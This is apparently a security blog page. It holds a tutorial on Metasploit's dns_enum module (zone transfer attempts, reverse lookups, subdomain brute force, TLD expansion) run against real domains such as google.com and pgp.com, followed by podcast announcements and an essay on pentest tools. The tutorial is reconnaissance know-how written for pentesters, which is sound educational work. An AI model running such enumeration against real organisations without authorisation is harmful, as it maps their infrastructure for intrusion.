The first enumeration is what I call a Standard Record Lookup where the module queries:

· SOA Start of Authority Record

· NS Name Server Records

· MX Mail Exchange Records

· TXT Text Record

From this query we can determine the Main name server for the zone, all other domain name servers, mail servers and with the TXT record the main thing to look for is the SPF1 record, it is used to specify what IP addresses are allowed to send emails on behalf of the domain.

Another lookup to execute is a check for all common SRV or service records, this returns the service type, the port, priority and A or AAA record for the service. Microsoft Active Directory and many Unified Communications solutions use these services.

The module is set by default to perform these queries plus try a Zone Transfer against all NS record returned by the SOA server. Zone Transfer enumeration is when one takes advantage of a miss configuration of the registered Name Servers for a given domain where they are set to share their zone file to anyone who request this information, typically NS servers are set to only share their zones with servers that form part of their infrastructure or probably with a service provider. These transfers are run thru TCP port 53. The module is set to first enumerate the SOA or start of authority of the domain we want to target and query it for list of NS servers it knows of and then goes one by one of this NS servers testing if they would send the entire zone for the given domain. The reason for why each NS server is tested even if one of them returns an answer is that the NS servers might not all be synchronizing with each other and we might get different records from each of the NS servers that are open to this technique, typically some servers are set for testing or staging while others run the production

environment. One thing to keep in mind about this test is that all IPS/IDS systems out there have rules to detect this method of enumeration, but it is one that if successful will give the largest amount of information with the least effort. Lets use google.com as a sample target domain:

msf auxiliary(dns_enum) > set DOMAIN google.com
DOMAIN => google.com
msf auxiliary(dns_enum) > run

[*] Setting DNS Server to google.com NS: 216.239.32.10
[*] Retrieving General DNS Records
[*] Domain: google.com IP Address: 74.125.53.100 Record: A 
[*] Domain: google.com IP Address: 74.125.45.100 Record: A 
[*] Domain: google.com IP Address: 74.125.67.100 Record: A 
[*] Start of Authority: ns1.google.com. IP Address: 216.239.32.10 Record: SOA
[*] Name Server: ns3.google.com. IP Address: 216.239.36.10 Record: NS
[*] Name Server: ns2.google.com. IP Address: 216.239.34.10 Record: NS
[*] Name Server: ns1.google.com. IP Address: 216.239.32.10 Record: NS
[*] Name Server: ns4.google.com. IP Address: 216.239.38.10 Record: NS
[*] Name: google.com.s9b2.psmtp.com. Preference: 10 Record: MX
[*] Name: google.com.s9b1.psmtp.com. Preference: 10 Record: MX
[*] Name: google.com.s9a2.psmtp.com. Preference: 10 Record: MX
[*] Name: google.com.s9a1.psmtp.com. Preference: 10 Record: MX
[*] Text: v=spf1 include:_netblocks.google.com ip4:216.73.93.70/31 ip4:216.73.93.72/31 ~all , TXT
[*] Setting DNS Server to google.com NS: 216.239.32.10
[*] Performing Zone Transfer against all nameservers in gmail.com
[*] Testing Nameserver: ns2.google.com.
AXFR query, switching to TCP
[*] Zone Transfer Failed
[*] Testing Nameserver: ns3.google.com.
AXFR query, switching to TCP
[*] Zone Transfer Failed
[*] Testing Nameserver: ns4.google.com.
AXFR query, switching to TCP
[*] Zone Transfer Failed
[*] Testing Nameserver: ns1.google.com.
AXFR query, switching to TCP
[*] Zone Transfer Failed
[*] Enumerating SRV Records for google.com
[*] SRV Record: _jabber._tcp.google.com Host: xmpp-server2.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _jabber._tcp.google.com Host: xmpp-server4.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _jabber._tcp.google.com Host: xmpp-server.l.google.com. Port: 5269 Priority: 5
[*] SRV Record: _jabber._tcp.google.com Host: xmpp-server3.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _jabber._tcp.google.com Host: xmpp-server1.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _xmpp-server._tcp.google.com Host: xmpp-server3.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _xmpp-server._tcp.google.com Host: xmpp-server1.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _xmpp-server._tcp.google.com Host: xmpp-server.l.google.com. Port: 5269 Priority: 5
[*] SRV Record: _xmpp-server._tcp.google.com Host: xmpp-server4.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _xmpp-server._tcp.google.com Host: xmpp-server2.l.google.com. Port: 5269 Priority: 20
[*] SRV Record: _xmpp-client._tcp.google.com Host: talk2.l.google.com. Port: 5222 Priority: 20
[*] SRV Record: _xmpp-client._tcp.google.com Host: talk3.l.google.com. Port: 5222 Priority: 20
[*] SRV Record: _xmpp-client._tcp.google.com Host: talk4.l.google.com. Port: 5222 Priority: 20
[*] SRV Record: _xmpp-client._tcp.google.com Host: talk1.l.google.com. Port: 5222 Priority: 20
[*] SRV Record: _xmpp-client._tcp.google.com Host: talk.l.google.com. Port: 5222 Priority: 5
[*] Auxiliary module execution completed

In this example we can see the Name Servers, Mail Servers and other standard records, as it can be seen the sfp records gives us the ip ranges for the mails servers, this ranges can later be examined by doing reverse lookups against them. Also on the SRV enumeration we can see all the jabber servers, their priority and ports, all of this very important information during a pentest when enumerating a target. Zone Transfer failed against all NS servers returned by our query. If examining a domain several of the ns servers enumerated do return the zone compare the results to make sure that one of those NS servers is not an orphan server not being updated or a possible test server.

The next method of enumeration is the Reverse Lookup, a typical DNS query where a name is resolved to an IP is known ad a Forward Lookup a reverse is just the opposite where we query is made for an IP and we get the FQDN (Fully Qualified Domain Name) for the IP, this method of enumeration tends to go un noticed by administrators and IPS/IDS systems. All hosts found thru this method must be verified since there might be old entries for none existing hosts and many times their name tends to give and idea of their purpose. Lets use PGP Corp. as an example, in the TXT record we see the spf1 entry with the ranges for host approved to send emails, lets enumerate on of this ranges:

[*] Setting DNS Server to pgp.com NS: 216.112.104.3
[*] Retrieving General DNS Records
[*] Domain: pgp.com IP Address: 209.237.226.39 Record: A 
[*] Start of Authority: ns1.pgp.com. IP Address: 216.112.104.3 Record: SOA
[*] Name Server: ns1.pgp.com. IP Address: 216.112.104.3 Record: NS
[*] Name Server: ns2.pgp.com. IP Address: 216.112.104.4 Record: NS
[*] Name Server: ns3.pgp.com. IP Address: 209.237.226.43 Record: NS
[*] Name: mx1.pgp.com. Preference: 10 Record: MX
[*] Name: mx2.pgp.com. Preference: 20 Record: MX
[*] Text: v=spf1 ip4:216.112.104.0/23 ip4:216.112.105.0/24 ip4:66.236.113.0/24 ip4:209.237.226.32/27 ip4:80.154.106.8 ?all , TXT
[*] Auxiliary module execution completed
msf auxiliary(dns_enum) > 

Know we choose the first IP range:

msf auxiliary(dns_enum) > set ENUM_AXFR false
ENUM_AXFR => false
msf auxiliary(dns_enum) > set ENUM_SRV false
ENUM_SRV => false
msf auxiliary(dns_enum) > set ENUM_STD false
ENUM_STD => false
msf auxiliary(dns_enum) > set ENUM_RVL true
ENUM_RVL => true
msf auxiliary(dns_enum) > set IPRANGE 216.112.105.0/24 
IPRANGE => 216.112.105.0/24
msf auxiliary(dns_enum) > run
[*] Setting DNS Server to pgp.com NS: 216.112.104.3
[*] Running Reverse Lookup against ip range 216.112.105.0-216.112.105.255
[*] Host Name: keys.testgeo.com. IP Address: 216.112.105.70
[*] Host Name: mail-out.pgp.com. IP Address: 216.112.105.68
[*] Host Name: gilda.pgp.com. IP Address: 216.112.105.67
[*] Host Name: gabriel.pgp.com. IP Address: 216.112.105.66
[*] Host Name: 216-112-105-64.pgp.com. IP Address: 216.112.105.64
[*] Host Name: mail-in.testgeo.com. IP Address: 216.112.105.69
[*] Host Name: chair-it.pgp.com. IP Address: 216.112.105.65
[*] Host Name: 216-112-105-71.pgp.com. IP Address: 216.112.105.71
[*] Host Name: dom01.mobile1.pgp.com. IP Address: 216.112.105.79
[*] Host Name: domeng.exchange.pgpeng.com. IP Address: 216.112.105.78
................
[*] Host Name: jrmobile.pgp.com. IP Address: 216.112.105.237
[*] Host Name: 216-112-105-238.pgp.com. IP Address: 216.112.105.238
[*] Host Name: cluster3.pgp.com. IP Address: 216.112.105.243
[*] Host Name: cluster1.pgp.com. IP Address: 216.112.105.241
[*] Host Name: cluster0.pgp.com. IP Address: 216.112.105.240
[*] Host Name: 216-112-105-239.pgp.com. IP Address: 216.112.105.239
[*] Host Name: cluster2.pgp.com. IP Address: 216.112.105.242
[*] Host Name: bletchley.pgp.com. IP Address: 216.112.105.244
[*] Host Name: mallen.pgp.com. IP Address: 216.112.105.245
[*] Host Name: mallenlaptop.pgp.com. IP Address: 216.112.105.246
[*] Host Name: mallenovid.pgp.com. IP Address: 216.112.105.247
[*] Host Name: 216-112-105-248.pgp.com. IP Address: 216.112.105.248
[*] Host Name: oakheaven.pgp.com. IP Address: 216.112.105.250
[*] Host Name: 216-112-105-253.pgp.com. IP Address: 216.112.105.253
[*] Host Name: 216-112-105-252.pgp.com. IP Address: 216.112.105.252
[*] Host Name: oak.pgp.com. IP Address: 216.112.105.249
[*] Host Name: pron.pgp.com. IP Address: 216.112.105.251
[*] Host Name: bubs.pgp.com. IP Address: 216.112.105.254
[*] Host Name: 216-112-105-255.pgp.com. IP Address: 216.112.105.255
[*] Auxiliary module execution completed
msf auxiliary(dns_enum) > 

The output was abbreviated, new domain names that must be tested appeared and many of the host names give idea of their purpose and naming scheme. This is one of the mail reasons that even when a zone transfer is successful other enumeration methods must be executed so as to be able to detect this other domains that might have escaped the initial enumeration.

Another method of enumerations the brute force enumeration where a dictionary file is use to try to identify host or subdomains for a given domain. A wordlist is used for this, the success of this method is dependant on the wordlist used, some main points for a good wordlist are:

• Words should follow the naming scheme of the target domain of one is found.
• All words must have valid DNS name charectes

The use of a password list is not recommended. A simple one is included with Metasploit and configured by default. Lets execute one against google.com:

msf auxiliary(dns_enum) > set ENUM_BRT true
ENUM_BRT => true
msf auxiliary(dns_enum) > set ENUM_STD false
ENUM_STD => false
msf auxiliary(dns_enum) > run

[*] Setting DNS Server to google.com NS: 216.239.32.10
[*] Host Name: academico.google.com IP Address: 74.125.47.105
[*] Host Name: academico.google.com IP Address: 74.125.47.103
[*] Host Name: academico.google.com IP Address: 74.125.47.106
[*] Host Name: academico.google.com IP Address: 74.125.47.147
[*] Host Name: academico.google.com IP Address: 74.125.47.99
[*] Host Name: academico.google.com IP Address: 74.125.47.104
[*] Host Name: ads.google.com IP Address: 74.125.159.112
[*] Host Name: alerts.google.com IP Address: 74.125.159.100
[*] Host Name: alerts.google.com IP Address: 74.125.159.101
[*] Host Name: alerts.google.com IP Address: 74.125.159.113
[*] Host Name: alerts.google.com IP Address: 74.125.159.102
[*] Host Name: alerts.google.com IP Address: 74.125.159.139
[*] Host Name: alerts.google.com IP Address: 74.125.159.138
[*] Host Name: ap.google.com IP Address: 74.125.47.105
[*] Host Name: ap.google.com IP Address: 74.125.47.103
[*] Host Name: ap.google.com IP Address: 74.125.47.104
[*] Host Name: ap.google.com IP Address: 74.125.47.106
[*] Host Name: ap.google.com IP Address: 74.125.47.147
[*] Host Name: ap.google.com IP Address: 74.125.47.99
[*] Host Name: apps.google.com IP Address: 74.125.159.101
[*] Host Name: apps.google.com IP Address: 74.125.159.139
[*] Host Name: apps.google.com IP Address: 74.125.159.113
[*] Host Name: apps.google.com IP Address: 74.125.159.138
[*] Host Name: apps.google.com IP Address: 74.125.159.100
[*] Host Name: apps.google.com IP Address: 74.125.159.102
[*] Host Name: asia.google.com IP Address: 66.249.89.103
[*] Host Name: asia.google.com IP Address: 66.249.89.99
[*] Host Name: asia.google.com IP Address: 66.249.89.147
[*] Host Name: asia.google.com IP Address: 66.249.89.104
[*] Host Name: blog.google.com IP Address: 74.125.47.191
[*] Host Name: calendar.google.com IP Address: 74.125.159.102
[*] Host Name: calendar.google.com IP Address: 74.125.159.113
[*] Host Name: calendar.google.com IP Address: 74.125.159.101
[*] Host Name: calendar.google.com IP Address: 74.125.159.139
[*] Host Name: calendar.google.com IP Address: 74.125.159.138
[*] Host Name: calendar.google.com IP Address: 74.125.159.100
[*] Host Name: catalog.google.com IP Address: 74.125.159.102
[*] Host Name: catalog.google.com IP Address: 74.125.159.113
..................................
[*] Auxiliary module execution completed
msf auxiliary(dns_enum) > 

One thing to remember is that depending on the size of the dictionary and the number of threads the time for performing this type of enumeration will vary.

Another type of DNS enumeration is TLD or Top Level Domain expansion where we look for other DNS registrations for our targets domain. There are 2 types of TLD the Country Code TLD or ccTLD to reflect a country and the gTLD the General TLD like for organization (org), information (info) and like wise, many company have servers deployed in different countries to provide faster service to users there and many times the updates and maintenance of this services are staged and done in a gradual process allowing for the possibility of finding vulnerable systems. One must take great care since the scope might limit one country and the understanding of the laws of that country must be understood before embarking on attacking this remote systems. The manner in the module works is that it will strip the TLD of the domain name and replace it with the most common one, many times companies and other DNS registrars have another level that they add that varies from registrar by registrar so a bit of Google enumeration might be needed to further enumerate any of them that might have been missed by the module. Here is a sample of doing a TLD Expansion against HP:

msf auxiliary(dns_enum) > set DOMAIN hp.co
DOMAIN => hp.co
msf auxiliary(dns_enum) > run

[*] Performing Top Level Domain Expansion
[*] Domain: hp.com Name: hp.com. IP Address: 15.216.110.140 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.192.45.21 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.192.45.22 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.192.45.138 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.192.45.139 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.200.2.21 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.200.30.21 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.200.30.22 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.200.30.23 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.200.30.24 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.216.110.21 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.216.110.22 Record: A 
[*] Domain: hp.com Name: hp.com. IP Address: 15.216.110.139 Record: A 
[*] Domain: hp.ag Name: hp.ag. IP Address: 217.26.48.101 Record: A 
[*] Domain: hp.az Name: hp.az. IP Address: 15.192.45.21 Record: A 
[*] Domain: hp.az Name: hp.az. IP Address: 15.192.45.22 Record: A 
[*] Domain: hp.az Name: hp.az. IP Address: 15.192.45.138 Record: A 
[*] Domain: hp.az Name: hp.az. IP Address: 15.192.45.139 Record: A 
[*] Domain: hp.az Name: hp.az. IP Address: 15.200.2.21 Record: A 
[*] Domain: hp.az Name: hp.az. IP Address: 15.200.30.21 Record: A 
.............................
[*] Auxiliary module execution completed

This has been a short introduction to DNS enumeration and what type of information can be gathered from this service.

Please join us live at 8:30 PM EST on Friday December 11th. We'll be recording from Larry's Barn with special guest Ben Jackson and have an interview with the gun packing, freedom enthusiast, beer chillin' Deviant Ollam

UPDATE [12/11]: Due to scheduling issues, Deviant will join us next week instead!

"Hack Naked, just not in the john."

The live stream should be active around 20:30 EST Friday night for Episode 179. Larry will be covering "Wireless for Information Gathering: Pagers" with Ben, Paul & Darren. Please keep in mind that the recording time is as fluid as Paul's carpet after a beer pour by Darren.


Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat!

PaulDotCom Icecast Radio

Please join us, enjoy the show live outside of the lav, and thanks for listening!

- Carlos, John, Larry, Mick, Paul & Darren.

The PaulDotCom crew interviews Christ Brenton and talks about firewalls, perimeter protection, and cats in the office.

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

This week I was glad to have a video recording, as the audio recorder ended up with a corrupt file system on the CF card and we lost the recording. Thanks to the Ustream recording and aricon's backup on the streaming server (thanks aricon!) we have an audio version that will come out later this week to populate the podcast feed. For all you PaulDotCom junkies, we have video versions of episode 178! See below for some dude wearing a Tenable golf shirt wearing headphones:

Part I - Interview With Chris Brenton:

Part II - Stories For Discussion & Debate:

The PaulDotCom crew talks about the differences between exploit frameworks, how we overcome our handicaps, and we rock the kung fu because you hacked my master!

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

One of the things I have been seeing a lot lately is a lot of people going Metasploit is better than Core and Core being better than Canvas and vise versa, the same for Nmap Portbunny and Unicorscan, and many other tools available out there. This type of thinking is a bit worrisome especially since the people that say this should be rational people that understand the working of the tools and their limitations and advantages. One of the first thing I was tough when learning about weapons is that never to call a weapon “Baby”, “Toy” or any other nick name just call it a tool, that lesson stuck with me for many things in my personal life and my professional life. Software and hardware are just tools each has it advantages and its drawbacks, the more tools one can master the more flexible one becomes, especially since you will be able to choose the right tool for the right moment and will also give you the ability to verify your results. No matter how good tools are they are written by human beings, heck this is the main reason for those of us that work in security have a job to do since humans are not perfect and we live from that imperfection, To this day I have not seen one single tool that does not generate a false positive or a false negative at any given time. This notion of mastering different tools is of great importance for a pentester in general since the engagement are not only limited in time but also limited in scope and have rules of engagement that limits him on what he can do, so having the flexibility to do the job in a fast and accurate manner is of great value. Not only should this apply to tools but also to operating systems, I have seen people who if it is not Linux it does not exist and the same on the Windows camp, there are time that when getting a tool on one system might take several steps longer on one are super simple on the other, virtualization has helped a lot to minimize this gap by allowing the user to have several operating systems to host his tools and to test before committing an action against a customer system. Mastering of the basics and the concepts makes the difference between being a script kiddy or a thru security professional, this mastery of the concepts and tools is what really gives the flexibility of choosing the right tool for the job.

Please join us live at 8:30 PM EST on Friday December 4th, when we will have Chris Brenton speaking about his ideal scientific test for finding a compatible geek match as well as another stellar Larry 'n Darren Workshop.


The live stream should be active around 20:30 EST Friday night for Episode 178. Please keep in mind that the recording time is as fluid as a newborn's first meal.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat!

PaulDotCom Icecast Radio

Please join us, enjoy the show live with your newborns, and thanks for listening!

- Darren, John, Larry, Mick, Paul & Carlos.